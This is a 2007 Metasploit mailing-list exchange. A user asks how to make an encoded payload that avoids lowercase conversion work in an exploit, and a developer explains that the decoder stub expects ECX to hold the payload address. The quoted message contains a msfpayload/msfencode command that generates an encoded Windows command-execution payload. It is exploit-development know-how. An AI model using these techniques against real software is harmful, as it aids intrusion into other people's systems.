Metasploit mailing list archives
Using encoded payload in executable
From: c0r31mp4ct at gmail.com (C0r3 1mp4ct)
Date: Fri, 8 Jun 2007 08:11:53 +0200
Yes! The software that I am trying to exploit, converts the chars to lowercase, just like with the ActiveX component mentioned in the articlcle about this encoder. "The decoder stub is hardcoded to assume that ecx will hold the address." Does it mean, that i have to put the address of the encoded payload into ecx before the control transfers to it? I mean it isn't enough to transfer to control with a JMP ESP, i need to have ECX store the address too. Could you help me, to get it working? On 6/7/07, mmiller at hick.org <mmiller at hick.org> wrote:
On Thu, Jun 07, 2007 at 10:43:17AM +0200, C0r3 1mp4ct wrote:Hi List! I tried to use the output of "./msfpayload -e windows/x86/exec CMD=cmd EXITFUNC=process R | ./msfencode -e x86/avoid_utf8_tolower c" in a C program that executes it by simply transferring the control to the string buffer containing the encoded payload. The payload is generated on Fedora Core 6.The avoid_utf8_tolower encoder may require some additional parameters in order for it to be used correctly. This specific encoder does not have a getpc stub, and therefore relies on a certain register holding the address of the encoded payload (including the decoder stub). The decoder stub is hardcoded to assume that ecx will hold the address. Does your vulnerability require you to use this specific encoder?
Current thread:
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 11)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)